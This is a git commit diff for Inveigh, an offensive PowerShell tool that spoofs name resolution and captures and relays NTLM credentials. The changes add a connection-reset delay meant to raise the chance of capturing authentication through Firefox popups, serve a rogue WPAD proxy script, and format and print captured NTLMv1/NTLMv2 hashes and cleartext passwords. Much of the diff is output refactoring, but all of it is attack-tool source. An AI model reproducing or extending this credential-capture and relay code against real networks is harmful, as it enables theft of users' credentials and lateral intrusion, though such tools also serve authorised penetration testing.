diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2017-04-09 16:19:59 -0400 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2017-04-09 16:19:59 -0400 |
| commit | f162c96d35758e1eed69c86e4145c7170bae4cb9 (patch) | |
| tree | 877b4f976efb9b199c23ea4ea9a3aaf93edef6a3 | |
| parent | bafadb040c779b025ce49cbd51f09d54653cd378 (diff) | |
| download | Inveigh-f162c96d35758e1eed69c86e4145c7170bae4cb9.tar.gz Inveigh-f162c96d35758e1eed69c86e4145c7170bae4cb9.zip | |
Inveigh 1.3.11.3.1
Added try/finally block to shutdown runspaces when using Empire 2.0's
"jobs kill" command.
Added handling for Firefox popup boxes.
Fixed Empire console output.
Various other small bug fixes and comment corrections.
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 439 | ||||
| -rw-r--r-- | Scripts/Inveigh.ps1 | 508 |
2 files changed, 580 insertions, 367 deletions
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index e706412..b7bd457 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -71,6 +71,14 @@ Default = localhost: The subject field for the cert that will be installed for H Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. +.PARAMETER HTTPResetDelay +Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +will have a delay before their connections are reset when Inveigh doesn't receive data. This can increase the +chance of capturing/relaying authentication through a popup box with some browsers (Firefox). + +.PARAMETER HTTPResetDelayTimeout +Default = 30 Seconds: HTTPResetDelay timeout in seconds. + .PARAMETER LogOutput Default = Enabled: (Y/N) Enable/Disable storing log messages in memory. @@ -142,7 +150,7 @@ Default = NTLM: (Anonymous/NTLM) HTTP/HTTPS server authentication type for wpad. Anonymous can prevent browser login prompts. .PARAMETER WPADAuthIgnore -Default = Disabled: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login popups for authenticated wpad.dat requests such as Firefox. @@ -158,6 +166,7 @@ https://github.com/Kevin-Robertson/Inveigh [CmdletBinding()] param ( + [parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox", [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", [parameter(Mandatory=$false)][Array]$Usernames = "", [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "", @@ -165,6 +174,7 @@ param [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", [parameter(Mandatory=$false)][Int]$HTTPPort = "80", [parameter(Mandatory=$false)][Int]$HTTPSPort = "443", + [parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30", [parameter(Mandatory=$false)][Int]$ProxyPort = "8492", [parameter(Mandatory=$false)][Int]$RunTime = "", [parameter(Mandatory=$true)][String]$Command = "", @@ -280,7 +290,7 @@ if($StartupChecks -eq 'Y') if($Proxy -eq 'Y') { - $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort " + $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort " } } @@ -525,23 +535,42 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') if($WPADAuthIgnore.Count -gt 0) { - $inveigh.status_queue.Add("WPAD NTLM Auth Ignored User Agents = " + ($WPADAuthIgnore -join ",")) > $null + $inveigh.status_queue.Add("WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null } } + $HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()}) + + if($HTTPResetDelay.Count -gt 0) + { + $inveigh.status_queue.Add("HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null + $inveigh.status_queue.Add("HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null + } + } if($Proxy -eq 'Y') { - $inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null - $ProxyPortFailover = $ProxyPort + 1 - $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}" - $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()}) - if($ProxyIgnore.Count -gt 0) + if($proxy_port_check) { - $inveigh.status_queue.Add("Proxy Ignored User Agents = " + ($ProxyIgnore -join ",")) > $null + $HTTP = "N" + $inveigh.status_queue.Add("Proxy Capture/Relay Disabled Due To In Use Port $ProxyPort") > $null + } + else + { + $inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null + $inveigh.status_queue.Add("Proxy Port = $ProxyPort") > $null + $ProxyPortFailover = $ProxyPort + 1 + $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}" + $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()}) + + if($ProxyIgnore.Count -gt 0) + { + $inveigh.status_queue.Add("Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null + } + } } @@ -675,29 +704,37 @@ if($inveigh.status_output) while($inveigh.status_queue.Count -gt 0) { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveAt(0) - } - else + switch -Wildcard ($inveigh.status_queue[0]) { - switch -Wildcard ($inveigh.status_queue[0]) + {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh-Relay" -or $_ -like "Windows Firewall = Enabled"} { - {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh-Relay" -or $_ -like "Windows Firewall = Enabled"} + if($inveigh.output_stream_only) { - Write-Warning ($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveAt(0) + Write-Output($inveigh.status_queue[0] + $inveigh.newline) + } + else + { + Write-Warning($inveigh.status_queue[0]) } - default + $inveigh.status_queue.RemoveAt(0) + } + + default + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.status_queue[0] + $inveigh.newline) + } + else { - Write-Output ($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveAt(0) + Write-Output($inveigh.status_queue[0]) } + $inveigh.status_queue.RemoveAt(0) } } @@ -2821,7 +2858,7 @@ $SMB_relay_response_scriptblock = # HTTP/HTTPS/Proxy Server ScriptBlock $HTTP_scriptblock = { - param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADAuthIgnore,$WPADResponse) + param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPS_listener,$Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$Usernames,$WPADAuth,$WPADAuthIgnore,$WPADResponse) function NTLMChallengeBase64 { @@ -3010,6 +3047,15 @@ $HTTP_scriptblock = $HTTP_stream = $HTTP_client.GetStream() } + if($HTTP_stream.DataAvailable) + { + $HTTP_data_available = $true + } + else + { + $HTTP_data_available = $false + } + while($HTTP_stream.DataAvailable) { $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) @@ -3061,7 +3107,7 @@ $HTTP_scriptblock = $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP") } - if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) + if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) { $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") @@ -3106,6 +3152,14 @@ $HTTP_scriptblock = { $HTTP_response_status_code = 0x34,0x30,0x31 $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 + + if($HTTP_request_raw_URL -match '/wpad.dat') + { + $HTTP_reset_delay = $true + $HTTP_reset_delay_timeout = New-TimeSpan -Seconds $HTTPResetDelayTimeout + $HTTP_reset_delay_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + } $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64 @@ -3226,13 +3280,13 @@ $HTTP_scriptblock = } else { - $NTLM = NTLMChallengeBase64 $Challenge + $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port } } else { - $NTLM = NTLMChallengeBase64 $Challenge + $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port } } @@ -3277,7 +3331,7 @@ $HTTP_scriptblock = $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" $NTLM_response = $NTLM_response.Insert(48,':') $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge - + if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) @@ -3364,7 +3418,7 @@ $HTTP_scriptblock = $HTTP_response_phrase = 0x4f,0x4b $HTTP_client_close = $true $NTLM_challenge = "" - + if($inveigh.SMB_relay -and $relay_step -eq 2) { @@ -3531,8 +3585,18 @@ $HTTP_scriptblock = } else { - $HTTP_client.Close() - $HTTP_client_close = $true + + if($HTTP_data_available -or !$HTTP_reset_delay -or $HTTP_reset_delay_stopwatch.Elapsed -ge $HTTP_reset_delay_timeout) + { + $HTTP_client.Close() + $HTTP_client_close = $true + $HTTP_reset_delay = $false + } + else + { + Start-Sleep -m 100 + } + } } @@ -3723,10 +3787,11 @@ function HTTPListener() $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument( - $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( - $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument( - $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument( - $WPADResponse) > $null + $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument( + $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument( + $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument( + $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null $HTTP_powershell.BeginInvoke() > $null } @@ -3749,10 +3814,11 @@ function HTTPSListener() $HTTPS_powershell.AddScript($SMB_relay_execute_scriptblock) > $null $HTTPS_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument( - $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( - $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument( - $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument( - $WPADResponse) > $null + $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument( + $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument( + $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument( + $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null $HTTPS_powershell.BeginInvoke() > $null } @@ -3775,10 +3841,11 @@ function ProxyListener() $proxy_powershell.AddScript($SMB_relay_execute_scriptblock) > $null $proxy_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument( - $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( - $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument( - $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument( - $WPADResponse) > $null + $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument( + $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument( + $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument( + $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null $proxy_powershell.BeginInvoke() > $null } @@ -3821,27 +3888,22 @@ if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $RelayAutoExit -or $Run } # Console Output Loop -if($inveigh.console_output) +try { - if($ConsoleStatus) - { - $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus - $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - } - - :console_loop while($inveigh.relay_running -and $inveigh.console_output) + if($inveigh.console_output) { - while($inveigh.console_queue.Count -gt 0) + if($ConsoleStatus) + { + $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + :console_loop while($inveigh.relay_running -and $inveigh.console_output) { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveAt(0) - } - else + while($inveigh.console_queue.Count -gt 0) { switch -wildcard ($inveigh.console_queue[0]) @@ -3849,16 +3911,34 @@ if($inveigh.console_output) {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"} { - Write-Warning ($inveigh.console_queue[0]) + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Warning($inveigh.console_queue[0]) + } + $inveigh.console_queue.RemoveAt(0) } - {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"} + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} { if($ConsoleOutput -eq 'Y') { - Write-Output ($inveigh.console_queue[0]) + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Output($inveigh.console_queue[0]) + } + } $inveigh.console_queue.RemoveAt(0) @@ -3870,7 +3950,16 @@ if($inveigh.console_output) if($ConsoleOutput -ne "Low") { - Write-Output ($inveigh.console_queue[0]) + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Output($inveigh.console_queue[0]) + } + } $inveigh.console_queue.RemoveAt(0) @@ -3879,7 +3968,16 @@ if($inveigh.console_output) default { - Write-Output ($inveigh.console_queue[0]) + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Output($inveigh.console_queue[0]) + } + $inveigh.console_queue.RemoveAt(0) } @@ -3887,114 +3985,123 @@ if($inveigh.console_output) } - } - - if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout) - { - - if($inveigh.cleartext_list.Count -gt 0) + if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout) { - Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline) - $inveigh.cleartext_list.Sort() - - foreach($unique_cleartext in $inveigh.cleartext_list) + + if($inveigh.cleartext_list.Count -gt 0) { - if($unique_cleartext -ne $unique_cleartext_last) + Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline) + $inveigh.cleartext_list.Sort() + + foreach($unique_cleartext in $inveigh.cleartext_list) { - Write-Output($unique_cleartext + $inveigh.newline) + if($unique_cleartext -ne $unique_cleartext_last) + { + Write-Output($unique_cleartext + $inveigh.newline) + } + + $unique_cleartext_last = $unique_cleartext } - $unique_cleartext_last = $unique_cleartext + Start-Sleep -m 5 + } + else + { + Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline) } - - Start-Sleep -m 5 - } - else - { - Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline) - } - if($inveigh.NTLMv1_list.Count -gt 0) - { - Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline) - $inveigh.NTLMv1_list.Sort() - - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + if($inveigh.NTLMv1_list.Count -gt 0) { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv1_list.Sort() - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) { - Write-Output($unique_NTLMv1 + $inveigh.newline) + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output($unique_NTLMv1 + $inveigh.newline) + } + + $unique_NTLMv1_account_last = $unique_NTLMv1_account } - $unique_NTLMv1_account_last = $unique_NTLMv1_account - } + $unique_NTLMv1_account_last = '' + Start-Sleep -m 5 + Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline) - $unique_NTLMv1_account_last = '' - Start-Sleep -m 5 - Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline) + foreach($NTLMv1_username in $inveigh.NTLMv1_username_list) + { + Write-Output($NTLMv1_username + $inveigh.newline) + } - foreach($NTLMv1_username in $inveigh.NTLMv1_username_list) + Start-Sleep -m 5 + } + else { - Write-Output($NTLMv1_username + $inveigh.newline) + Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline) } - Start-Sleep -m 5 - } - else - { - Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline) - } - - if($inveigh.NTLMv2_list.Count -gt 0) - { - Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline) - $inveigh.NTLMv2_list.Sort() - - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) + if($inveigh.NTLMv2_list.Count -gt 0) { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv2_list.Sort() - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) { - Write-Output($unique_NTLMv2 + $inveigh.newline) - } + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output($unique_NTLMv2 + $inveigh.newline) + } - $unique_NTLMv2_account_last = '' - Start-Sleep -m 5 - Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline) + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } - foreach($NTLMv2_username in $inveigh.NTLMv2_username_list) + $unique_NTLMv2_account_last = '' + Start-Sleep -m 5 + Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline) + + foreach($NTLMv2_username in $inveigh.NTLMv2_username_list) + { + Write-Output($NTLMv2_username + $inveigh.newline) + } + + } + else { - Write-Output($NTLMv2_username + $inveigh.newline) + Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline) } - + + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } - else + + if($inveigh.console_input) { - Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline) - } - $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop + } + + } + Start-Sleep -m 5 } - if($inveigh.console_input) - { + } - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop - } - - } +} +finally +{ - Start-Sleep -m 5 + if($Tool -eq 2) + { + $inveigh.relay_running = $false } } @@ -4315,51 +4422,51 @@ if($inveigh.tool -ne 1) :console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) { - while($inveigh.console_queue.Count -gt 0) - { - - switch -wildcard ($inveigh.console_queue[0]) + while($inveigh.console_queue.Count -gt 0) { - {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"} - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } - - {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} + switch -wildcard ($inveigh.console_queue[0]) { - if($ConsoleOutput -eq 'Y') + {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"} { - Write-Output $inveigh.console_queue[0] + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) } - $inveigh.console_queue.RemoveAt(0) + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} + { - } + if($ConsoleOutput -eq 'Y') + { + Write-Output $inveigh.console_queue[0] + } - {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"} - { + $inveigh.console_queue.RemoveAt(0) + + } + + {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"} + { - if($ConsoleOutput -ne "Low") + if($ConsoleOutput -ne "Low") + { + Write-Output $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + + } + + default { Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) } - $inveigh.console_queue.RemoveAt(0) - } - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } - - } - - } + } if([Console]::KeyAvailable) { diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index 82220d8..1a6f8b7 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -61,28 +61,36 @@ Default = Any: IP address for the HTTP/HTTPS listener. Default = 80: TCP port for the HTTP listener. .PARAMETER HTTPAuth -Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not +Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS listener authentication type. This setting does not apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. .PARAMETER HTTPBasicRealm Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. .PARAMETER HTTPContentType -Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to +Default = text/html: Content type for HTTP/HTTPS/Proxy responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse. .PARAMETER HTTPDir Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. .PARAMETER HTTPDefaultFile -Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for +Filename within the HTTPDir to serve as the default HTTP/HTTPS/Proxy response file. This file will not be used for wpad.dat requests. .PARAMETER HTTPDefaultEXE -EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. +EXE filename within the HTTPDir to serve as the default HTTP/HTTPS/Proxy response for EXE requests. + +.PARAMETER HTTPResetDelay +Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +will have a delay before their connections are reset when Inveigh doesn't receive data. This can increase the +chance of capturing authentication through a popup box with some browsers (Firefox). + +.PARAMETER HTTPResetDelayTimeout +Default = 30 Seconds: HTTPResetDelay timeout in seconds. .PARAMETER HTTPResponse -String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. +Content to serve as the default HTTP/HTTPS/Proxy response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes and newlines where necessary. .PARAMETER HTTPS @@ -163,10 +171,10 @@ running Inveigh through a shell that does not return other output streams.Note t yellow warning messages if enabled. .PARAMETER Proxy -Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures. +Default = Disabled: (Y/N) Enable/Disable proxy listener authentication captures. .PARAMETER ProxyAuth -Default = NTLM: (Basic/NTLM/NTLMNoESS) Proxy server authentication type. +Default = NTLM: (Basic/NTLM/NTLMNoESS) Proxy listener authentication type. .PARAMETER ProxyIP Default = Any: IP address for the proxy listener. @@ -230,7 +238,7 @@ Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running serv Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. .PARAMETER RunCount -Default = Unlimited: (Integer) Number of captures to perform before auto-exiting. +Default = Unlimited: (Integer) Number of NTLMv1/NTLMv2/cleartext captures to perform before auto-exiting. .PARAMETER RunTime (Integer) Run time duration in minutes. @@ -241,12 +249,12 @@ PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and 0 = None, 1 = Metasploit/Meterpreter, 2 = Empire .PARAMETER WPADAuth -Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. +Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS listener authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. .PARAMETER WPADAuthIgnore -Default = Disabled: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login popups for authenticated wpad.dat requests such as Firefox. @@ -308,17 +316,19 @@ https://github.com/Kevin-Robertson/Inveigh [CmdletBinding()] param ( + [parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox", [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "", [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "", [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "", [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "", [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "", - [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "", + [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "Firefox", [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1", [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", [parameter(Mandatory=$false)][Int]$HTTPPort = "80", [parameter(Mandatory=$false)][Int]$HTTPSPort = "443", + [parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30", [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30", [parameter(Mandatory=$false)][Int]$mDNSTTL = "120", [parameter(Mandatory=$false)][Int]$NBNSTTL = "165", @@ -386,7 +396,7 @@ if ($invalid_parameter) throw } -$inveigh_version = "1.3" +$inveigh_version = "1.3.1" if(!$IP) { @@ -526,7 +536,7 @@ if($StartupChecks -eq 'Y') if($Proxy -eq 'Y') { - $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort " + $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort " } if($LLMNR -eq 'Y' -and !$elevated_privilege) @@ -721,10 +731,7 @@ if($mDNS -eq 'Y') if($elevated_privilege -or !$mDNS_port_check) { - $inveigh.status_queue.Add("mDNS Spoofer = Enabled") > $null - $inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null $mDNSTypes_output = $mDNSTypes -join "," - $mDNS_response_message = "- response sent" if($mDNSTypes.Count -eq 1) { @@ -735,6 +742,9 @@ if($mDNS -eq 'Y') 